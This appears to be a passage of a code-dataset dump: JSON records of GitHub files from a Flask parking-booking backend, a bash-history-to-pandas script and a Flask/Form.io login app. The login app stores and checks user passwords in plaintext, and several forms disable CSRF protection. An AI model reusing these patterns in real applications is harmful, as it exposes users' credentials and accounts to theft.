cur_profile.last_name = form.lastname.data\n current_user.email = data['email']\n cur_profile.address = data['address']\n cur_profile.phone = data['phone']\n cur_profile.avatar_url = data['avatar']\n db.session.commit()\n return jsonify(\"success!\")\n else:\n return jsonify(form.errors)\n return jsonify({'data': data})\n\n\n # datastore = json.loads(data)\n\n\[email protected](\"/addbuilding\", methods = ['POST', 'GET'])\ndef addbuilding():\n if request.method == 'POST':\n data = request.get_json()\n print('datattatatatat', data['buildingname'], current_user)\n newbuilding = Building(user = current_user.id, buildingname = data['buildingname'], buildingcontact = data['buildingcontact'], location = data['location'], description = data['description'], street_location = data['street'])\n db.session.add(newbuilding)\n db.session.commit()\n return jsonify(data)\n else:\n pass\[email protected](\"/updatebuilding\", methods = ['POST', 'GET'])\ndef updatebuilding():\n if request.method == 'POST':\n data = request.get_json()\n print('datattatatatat', data['buildingname'], current_user)\n cur_building = Building.query.filter_by(user = current_user.id).first()\n cur_building.buildingname = data['buildingname']\n cur_building.buildingcontact = data['buildingcontact']\n cur_building.location = data['location']\n cur_building.description = data['description']\n cur_building.totalparkingslot = data['totalparkingslot']\n cur_building.image_url = data['image_url']\n db.session.commit()\n return jsonify(data)\n else:\n pass\n\n\n\[email protected](\"/data/building\", methods = ['POST', 'GET'])\ndef data_user_building():\n if request.method == \"GET\" :\n building_available = Building.query.all()\n total_lot = Parking.query.with_entities(Parking.building_id, func.count(Parking.status)).group_by(Parking.building_id).all()\n avaivale_lot = Parking.query.with_entities(Parking.building_id, func.count(Parking.status)).group_by(Parking.building_id).filter_by(status = 'Available').all()\n print (total_lot, avaivale_lot)\n building_schema = BuildingSchema(many = True , exclude = 'totaltransaction') \n out_put = building_schema.dump(building_available).data\n return jsonify({'data': out_put, 'total_lot': total_lot , 'avaivale_lot': avaivale_lot } ) \n else:\n data = request.get_json()\n print('datattatatatat', data)\n # datastore = json.loads(data)\[email protected](\"/data/building/<idx>\", methods = ['POST', 'GET'])\ndef data_user_building_parking(idx):\n if request.method == \"GET\" : \n current_building = Building.query.filter_by(id = idx).first()\n building_schema = BuildingSchema() \n out_put = building_schema.dump(current_building).data\n return jsonify({'data': out_put} ) \n \[email protected](\"/manage/building\", methods = ['POST', 'GET'])\ndef manage_building():\n if request.method == 'GET':\n current_building = Building.query.filter_by(user = current_user.id).first()\n building_schema = BuildingSchema() \n out_put = building_schema.dump(current_building).data\n return jsonify({'data': out_put } ) \n else:\n return jsonify('helo')\n\n\[email protected]('interval', id='do_job_1', minutes= 5, misfire_grace_time=900)\ndef job1():\n with db.app.app_context():\n check_parking = Parking.query.filter_by( in_use_status = 'booking' ).all()\n # # cur_parking = Parking.query.filter_by(id =37).first()\n time_now = datetime.now()\n print('is running?')\n # time_check = time_now - cur_parking.time_booking\n # print('timechecking', time_check)\n for cur_parking in check_parking:\n if ((time_now - cur_parking.time_booking).total_seconds() > 900):\n print(((time_now - cur_parking.time_booking)))\n cur_parking.status = 'Available'\n cur_parking.status_color = 'green'\n cur_parking.owneruser = None\n cur_parking.time_booking = None\n cur_parking.in_use_status = 'not_use'\n db.session.commit()\n\n"
},
{
"alpha_fraction": 0.6759011745452881,
"alphanum_fraction": 0.6864473223686218,
"avg_line_length": 37.503028869628906,
"blob_id": "2f254ac4b8a4fa86c5a99a3e7e5819587e2c755d",
"content_id": "1c03652eced3114cb0ae14b846e0ebe72e18780b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6353,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 165,
"path": "/app/models.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import types\nfrom flask_login import LoginManager, UserMixin\nfrom flask_dance.consumer.storage.sqla import OAuthConsumerMixin\nfrom flask_marshmallow import Marshmallow\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom wtforms.fields.html5 import DateTimeLocalField\nimport datetime\nfrom sqlalchemy import desc\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\nclass ProfileUser(db.Model):\n __tablename__=\"profile\"\n id = db.Column(db.Integer, primary_key = True)\n first_name = db.Column(db.String(80))\n last_name = db.Column(db.String(80))\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n avatar_url = db.Column(db.String, default = 'https://pbs.twimg.com/profile_images/787106179482869760/CwwG2e2M_400x400.jpg')\n phone = db.Column(db.Integer)\n address = db.Column(db.String)\n created_at = db.Column(db.DateTime, server_default=db.func.now())\n updated_at = db.Column(\n db.DateTime, server_default=db.func.now(), server_onupdate=db.func.now())\n\n\nclass Price(db.Model):\n __tablename__='price'\n id = db.Column(db.Integer, primary_key= True)\n pricetype = db.Column(db.String)\n price = db.Column(db.Integer)\nclass Transaction(db.Model):\n __tablename__ = \"transaction\"\n id = db.Column(db.Integer, primary_key= True)\n user = db.Column(db.Integer, db.ForeignKey('users.id'))\n building = db.Column(db.Integer, db.ForeignKey('building.id'))\n parking =db.Column(db.Integer, db.ForeignKey('parking.id'))\n price = db.Column(db.Integer)\n status = db.Column(db.String, default = 'Checkin')\n ticket_qrcode = db.Column(db.String)\n time_check_in = db.Column(\n db.DateTime , default = None)\n time_check_out = db.Column(\n db.DateTime, default = None)\n\n time_lot = db.Column(db.String)\n totalbill = db.Column(db.Integer)\n\nclass Parking(db.Model):\n __tablename__=\"parking\"\n id = db.Column(db.Integer,primary_key = True)\n name = db.Column(db.String, default = 'No.')\n building_id = db.Column(db.Integer, db.ForeignKey('building.id'))\n transaction = db.relationship('Transaction', backref = 'parkingtrans' ,order_by = 'desc(Transaction.id)')\n status = db.Column(db.String, default = 'Available')\n status_color = db.Column(db.String, default = 'green')\n book_by = db.Column(db.Integer, db.ForeignKey('users.id'))\n time_booking = db.Column(db.DateTime)\n price = db.Column(db.Integer)\n in_use_status = db.Column(db.String, default = 'not_use')\n \nclass Building(db.Model):\n __tablename__=\"building\"\n id = db.Column(db.Integer, primary_key = True)\n user = db.Column(db.Integer, db.ForeignKey('users.id'))\n buildingname = db.Column(db.String, unique = True)\n buildingcontact = db.Column(db.String)\n image_url = db.Column(db.String , default = 'http://images.adsttc.com/media/images/51d4/84a8/b3fc/4bea/e100/01d6/medium_jpg/Portada.jpg?1372882078')\n location = db.Column(db.String)\n description = db.Column(db.String)\n totalparkingslot = db.Column(db.Integer)\n parkings = db.relationship('Parking', backref = 'parkinglot', order_by = 'Parking.id')\n totaltransaction = db.relationship('Transaction', backref= 'totaltrans', order_by ='desc(Transaction.id)')\n street_location = db.Column(db.String)\n\nclass User(UserMixin, db.Model):\n __tablename__='users'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True)\n email = db.Column(db.String(255) , unique= True)\n password = db.Column(db.String(255))\n profiles = db.relationship('ProfileUser', backref= 'owneruser')\n building = db.relationship('Building', backref= 'owneruser')\n transactions = db.relationship('Transaction', backref='owneruser', order_by = 'desc(Transaction.id)')\n parkings = db.relationship('Parking', backref = 'owneruser' )\n\n def __repr__(self):\n return \"{}\".format(self.name)\n\n def set_password(self, password):\n self.password = generate_password_hash(password)\n\n def check_password(self, password):\n return check_password_hash(self.password, password)\n\nclass OAuth(OAuthConsumerMixin, db.Model):\n provider_user_id = db.Column(db.String(256), unique=True, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)\n user = db.relationship(User)\n\n\nclass Token(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String, unique=True)\n user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False)\n user = db.relationship(User, backref = 'token_user')\n\n\n\nclass UserSchema(ma.ModelSchema):\n\n class Meta:\n model = User\n ordered = True\n building = ma.Nested('BuildingSchema', many = True, ordered= True)\n profiles = ma.Nested('ProfileSchema', many=True)\n # transactions = ma.Nested('TransactionSchema', many =True,ordered= True)\n parkings = ma.Nested('ParkingSchema', many = True , ordered = True)\n\nclass BuildingSchema(ma.ModelSchema):\n \n class Meta:\n model = Building\n ordered = True\n parkings = ma.Nested('ParkingSchema', many = True,ordered= True)\n totaltransaction = ma.Nested('TransactionSchema', many =True,ordered= True)\nclass ParkingSchema(ma.ModelSchema):\n \n class Meta:\n ordered = True\n model = Parking\n transaction = ma.Nested('TransactionSchema', many =True,ordered= True)\n owneruser = ma.Nested('UserSchema', exclude=('building', 'parkings','transaction'))\n parkinglot = ma.Nested('BuildingSchema', exclude = ('parkings' , 'transaction'))\nclass TransactionSchema(ma.ModelSchema):\n class Meta:\n model = Transaction\n ordered = True\n\nclass ProfileSchema(ma.ModelSchema):\n class Meta:\n model = ProfileUser\n ordered = True\n\n# setup login manager\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"facebook.login\"\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n@login_manager.request_loader\ndef load_user_from_request(request):\n # Login Using our Custom Header\n api_key = request.headers.get('Authorization')\n if api_key:\n api_key = api_key.replace('Token ', '', 1)\n token = Token.query.filter_by(uuid=api_key).first()\n if token:\n return token.user\n\n return None\n"
},
{
"alpha_fraction": 0.6282246112823486,
"alphanum_fraction": 0.67678302526474,
"avg_line_length": 22.535715103149414,
"blob_id": "a681320c0338e08dceca5c61fbce128477e64f57",
"content_id": "ac0fdf5ec8003f0737aebd905679b879263b0926",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 28,
"path": "/migrations/versions/c5da706b2e1f_.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: c5da706b2e1f\nRevises: 7a6929cbc905\nCreate Date: 2019-07-30 10:47:59.022050\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c5da706b2e1f'\ndown_revision = '7a6929cbc905'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('building', sa.Column('street_location', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('building', 'street_location')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.6949428915977478,
"alphanum_fraction": 0.6949428915977478,
"avg_line_length": 42.71428680419922,
"blob_id": "7e96745b7fbd826edc29c9c8dc1839a915e9b0aa",
"content_id": "53a8dc66ada37339ca0c5f45795c63dc20f8b25b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1839,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 42,
"path": "/app/forms.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, ValidationError, TextAreaField,SelectField\nfrom wtforms.validators import DataRequired, Email, EqualTo, Length , InputRequired\nfrom .models import User\n\nclass SignupForm(FlaskForm):\n class Meta():\n csrf= False\n sname = StringField('User name', validators=[DataRequired()])\n semail = StringField('Email', validators=[DataRequired(), Email(\"This field require an email address\")])\n spassword = PasswordField(\"Password\", validators=[DataRequired()])\n sconfirm = PasswordField(\"ConFirmPassword\", validators=[DataRequired(), EqualTo('spassword')])\n saddress = StringField(\"Address\", validators=[DataRequired()])\n submit =SubmitField('Sign Up')\n def validate_sname(self, field):\n if User.query.filter_by(name=field.data).first():\n raise ValidationError(\"Your username has been registered!!!\")\n\n def validate_semail(self, field):\n if User.query.filter_by(email=field.data).first():\n raise ValidationError(\"Your email has been registered!!!\")\n\nclass SigninForm(FlaskForm):\n class Meta:\n csrf = False\n username = StringField('User name', validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n submit =SubmitField('Sign In')\n\n\n\nclass EditProfileForm(FlaskForm):\n class Meta:\n csrf = False\n firstname = StringField('Name', validators=[DataRequired()])\n lastname = StringField('Name', validators=[DataRequired()])\n email = StringField('Email', validators=[DataRequired()])\n phone = StringField('Phone')\n avatar = StringField('Avatar')\n address = StringField('Address')\n # submit = SubmitField('Change')\n # password = PasswordField(\"Password\", validators=[DataRequired()])\n\n\n\n"
},
{
"alpha_fraction": 0.643660306930542,
"alphanum_fraction": 0.6508336663246155,
"avg_line_length": 40.263999938964844,
"blob_id": "4ea9afea750267863dc15f683ccb27f29eddafdf",
"content_id": "f5dd848cc84d6badc31e927bde129165163615f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5158,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 125,
"path": "/migrations/versions/7a6929cbc905_.py",
"repo_name": "NguyenHuy1812/ParkingHero-Back",
"src_encoding": "UTF-8",
"text": "\"\"\"empty message\n\nRevision ID: 7a6929cbc905\nRevises: \nCreate Date: 2019-07-29 16:03:52.942820\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n# revision identifiers, used by Alembic.\nrevision = '7a6929cbc905'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('price',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pricetype', sa.String(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=80), nullable=True),\n sa.Column('email', sa.String(length=255), nullable=True),\n sa.Column('password', sa.String(length=255), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('name')\n )\n op.create_table('building',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('buildingname', sa.String(), nullable=True),\n sa.Column('buildingcontact', sa.String(), nullable=True),\n sa.Column('image_url', sa.String(), nullable=True),\n sa.Column('location', sa.String(), nullable=True),\n sa.Column('description', sa.String(), nullable=True),\n sa.Column('totalparkingslot', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('buildingname')\n )\n op.create_table('flask_dance_oauth',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('provider', sa.String(length=50), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('token', sqlalchemy_utils.types.json.JSONType(), nullable=False),\n sa.Column('provider_user_id', sa.String(length=256), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('provider_user_id')\n )\n op.create_table('profile',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=80), nullable=True),\n sa.Column('last_name', sa.String(length=80), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('avatar_url', sa.String(), nullable=True),\n sa.Column('phone', sa.Integer(), nullable=True),\n sa.Column('address', sa.String(), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('token',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('uuid', sa.String(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('uuid')\n )\n op.create_table('parking',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=True),\n sa.Column('building_id', sa.Integer(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('status_color', sa.String(), nullable=True),\n sa.Column('book_by', sa.Integer(), nullable=True),\n sa.Column('time_booking', sa.DateTime(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('in_use_status', sa.String(), nullable=True),\n sa.ForeignKeyConstraint(['book_by'], ['users.id'], ),\n sa.ForeignKeyConstraint(['building_id'], ['building.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('transaction',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=True),\n sa.Column('building', sa.Integer(), nullable=True),\n sa.Column('parking', sa.Integer(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('ticket_qrcode', sa.String(), nullable=True),\n sa.Column('time_check_in', sa.DateTime(), nullable=True),\n sa.Column('time_check_out', sa.DateTime(), nullable=True),\n sa.Column('time_lot', sa.String(), nullable=True),\n sa.Column('totalbill', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['building'], ['building.id'], ),\n sa.ForeignKeyConstraint(['parking'], ['parking.id'], ),\n sa.ForeignKeyConstraint(['user'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('transaction')\n op.drop_table('parking')\n op.drop_table('token')\n op.drop_table('profile')\n op.drop_table('flask_dance_oauth')\n op.drop_table('building')\n op.drop_table('users')\n op.drop_table('price')\n # ### end Alembic commands ###\n"
}
] | 5 |
weavermonkey/bash_history_to_pandas | https://github.com/weavermonkey/bash_history_to_pandas | 16c9f6bb8779cd636a9a28a17b5ef250d64c3f6a | 9a89268daf3f87ade900bb5c777eae5560baf5dc | 5a9326d958278cfe301da111c0a380227322534f | refs/heads/master | 2021-05-05T21:19:22.418573 | 2017-12-27T13:30:32 | 2017-12-27T13:30:32 | 115,520,158 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 65,
"blob_id": "91b7e8499c4094776110ab873a926f131827670b",
"content_id": "89babb952a63c24b767ff0e61de46ed008111b84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 2,
"path": "/README.md",
"repo_name": "weavermonkey/bash_history_to_pandas",
"src_encoding": "UTF-8",
"text": "# bash_history_to_pandas\nSave Ubuntu's bash history to a CSV, use pandas to get the first and last command every day with timestamp\n"
},
{
"alpha_fraction": 0.6672012805938721,
"alphanum_fraction": 0.6696070432662964,
"avg_line_length": 37.96875,
"blob_id": "6144abc4993f3966db5ce11471a726cea9547794",
"content_id": "322e8758f87a3bce07104fc565e5712eeccc6ab3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 32,
"path": "/first_last_command.py",
"repo_name": "weavermonkey/bash_history_to_pandas",
"src_encoding": "UTF-8",
"text": "from os import path\nfrom datetime import datetime\nimport pandas as pd\n\nhistory_dict = {'dt':[],'command':[]}\nhistory_timestamps = []\nhistory_commands = []\n\ndef create_dataframe_from_bash_history():\n\tfor curr_line in open( path.expanduser( '~/.bash_history' ),'rb' ):\n\t\tif curr_line[0] == '#':\n\t\t\thistory_timestamps.append( datetime.fromtimestamp( float( curr_line[1:].strip() ) ) )\n\n\t\telif curr_line[0] != '#' and curr_line != '':\n\t\t\thistory_commands.append(curr_line.strip())\n\t\n\tfor i in range( len( history_timestamps ) ):\n\t\thistory_dict['dt'].append(history_timestamps[i])\n\t\thistory_dict['command'].append(history_commands[i])\n\t\n\tpd_df = pd.DataFrame.from_dict( history_dict )\n\treturn pd_df\n\ndef print_first_last_command_per_day():\n\thistory_df = create_dataframe_from_bash_history()\n\thistory_df['dt'] = pd.to_datetime( history_df['dt'], format='%Y-%m-%d %H:%M:%S' )\n\tfirst_commands = history_df.groupby(history_df['dt'].dt.date).first()\n\tlast_commands = history_df.groupby(history_df['dt'].dt.date).last()\n\tfor i in range ( len(first_commands) ):\n\t\tprint first_commands.dt.iloc[i],first_commands.command.iloc[i],'\\n', last_commands.dt.iloc[i],last_commands.command.iloc[i],'\\n______________________________'\n\nprint_first_last_command_per_day()\n"
}
] | 2 |
trialrepo/python-flask-formio-gcp | https://github.com/trialrepo/python-flask-formio-gcp | 63693bf1ab2a281b4652dc3ae525939780f2ee8c | 8e3bf420a373844b40db8849766e059aa31cac65 | 30e01d3434523e6eb7f2a02e78a07500764ee5b7 | refs/heads/master | 2020-03-21T12:24:31.228808 | 2018-06-25T06:14:33 | 2018-06-25T06:14:33 | 138,551,001 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "c256ed1c5d86450eb86d61d5a09074d79d30b673",
"content_id": "5ceaf6c4ac01295d7a3b882dd440d831ea1d30d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/tempfile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tempfile.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "3c4fe54d2db5f699e801672fd5bae1109afdf78b",
"content_id": "118df5fcfd5236bc1c6f7686a35c176afe945a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/tokenize.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tokenize.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "b9f3ced9aa6e7188b61a5f441c7da42280dfbfdf",
"content_id": "d76fddcd4883acd1cd038b6071607026db36f1c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/operator.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/operator.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "500e46ada6b6931bc5beb05dcfc6eca37e1a15bd",
"content_id": "3bea41fce2ffa12ebae3819acfce310cb29ef2e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/types.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/types.py"
},
{
"alpha_fraction": 0.7758620977401733,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 58,
"blob_id": "021d28e49fd13cca121090f8b6f30b4d137ebb2e",
"content_id": "54aa43abc6b3b011f20dc25212cbe8ef9ddbe8f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/env/lib/python3.6/_collections_abc.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_collections_abc.py"
},
{
"alpha_fraction": 0.6313537955284119,
"alphanum_fraction": 0.6439355611801147,
"avg_line_length": 30.79199981689453,
"blob_id": "03f3557cd71799bf0525d41445169b23e28a04ab",
"content_id": "2eaa4257f8e222b758feace56ab36c2b93649166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3974,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 125,
"path": "/main.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "import datetime\nimport logging\nimport os\nimport socket\n\nfrom flask import Flask, request, render_template, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nimport sqlalchemy\nimport json\n\napp = Flask(__name__)\n\n\ndef is_ipv6(addr):\n \"\"\"Checks if a given address is an IPv6 address.\"\"\"\n try:\n socket.inet_pton(socket.AF_INET6, addr)\n return True\n except socket.error:\n return False\n\n\n# [START example]\n# Environment variables are defined in app.yaml.\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['SQLALCHEMY_DATABASE_URI']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n email = db.Column(db.String(50), primary_key = True)\n password = db.Column(db.String(50))\n\nclass Details(db.Model):\n first = db.Column(db.String(50))\n last = db.Column(db.String(50))\n address = db.Column(db.String(200))\n phone = db.Column(db.String(10), primary_key = True)\n desc = db.Column(db.String(500))\n salary = db.Column(db.String(50))\n sign = db.Column(db.LargeBinary())\n\[email protected]('/')\ndef index():\n error = request.args.get('error')\n message = request.args.get('message')\n return render_template('index.html', error = error, message = message )\n\[email protected]('/register',methods=['POST']) \ndef register():\n #username = request.form['name']\n #password = request.form['password']\n #email = request.form['email']\n user = request.get_json()\n username = user[\"data\"][\"email\"]\n password = user[\"data\"][\"password\"]\n print(username)\n print(password)\n user = User(password = password, email = username)\n db.session.add(user)\n db.session.commit()\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n #return render_template('index.html', message = \"Succesfully registered. Please login to continue!\")\n\[email protected]('/login',methods=['POST']) \ndef login():\n # read the posted values from the UI\n user = request.get_json()\n username = user[\"data\"][\"email\"]\n password = user[\"data\"][\"password\"]\n print(username)\n print(password)\n user =User.query.filter_by(email = username, password = password).first()\n if user :\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n else:\n return json.dumps({'error':True}), 500, {'ContentType':'application/json'} \n\n\[email protected]('/welcome.html')\ndef handler():\n message = request.args.get('message') \n if message:\n return render_template('welcome.html', message = message) \n else:\n return render_template('welcome.html')\n\n\[email protected]('/process')\ndef process():\n submission = request.args.get('submission')\n return render_template('process.html', submission = submission) \n \[email protected]('/desc',methods=['POST']) \ndef userdetails():\n # read the posted values from the UI\n user = request.get_json()\n first = user[\"data\"][\"firstName\"]\n last = user[\"data\"][\"lastName\"]\n phone = user[\"data\"][\"phonenumber\"]\n salary = user[\"data\"][\"salary\"]\n desc = user[\"data\"][\"description\"]\n address = user[\"data\"][\"address\"]\n sign = user[\"data\"][\"signature\"]\n\n details = Details(first = first, last = last, phone = phone, salary = salary, \n desc = desc , address = address, sign = bytes(sign,encoding = 'utf-8'))\n db.session.add(details)\n db.session.commit()\n return json.dumps({'error':False}), 200, {'ContentType':'application/json'}\n \[email protected](500)\ndef server_error(e):\n logging.exception('An error occurred during a request.')\n return \"\"\"\n An internal error occurred: <pre>{}</pre>\n See logs for full stacktrace.\n \"\"\".format(e), 500\n\n\nif __name__ == '__main__':\n # This is used when running locally. Gunicorn is used to run the\n # application on Google App Engine. See entrypoint in app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "c39beadeacd13caf8adb2f326a70dfaf7cf006fd",
"content_id": "b644a7359a9c896f1790ede495cc31ac8bfd6fd9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/locale.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/locale.py"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 53,
"blob_id": "52ea078474cb23b4a8d4ee25870b86fa5c325b9f",
"content_id": "5a1cef6751a0007b8959ffcbd69fcfb6bc957507",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/genericpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/genericpath.py"
},
{
"alpha_fraction": 0.7555555701255798,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 45,
"blob_id": "58b4c8705a633f2212b8002039b001b81c52b5b0",
"content_id": "6af4e5ac498ca2824d81666d52f96b5e0720815f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 1,
"path": "/env/lib/python3.6/imp.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/imp.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
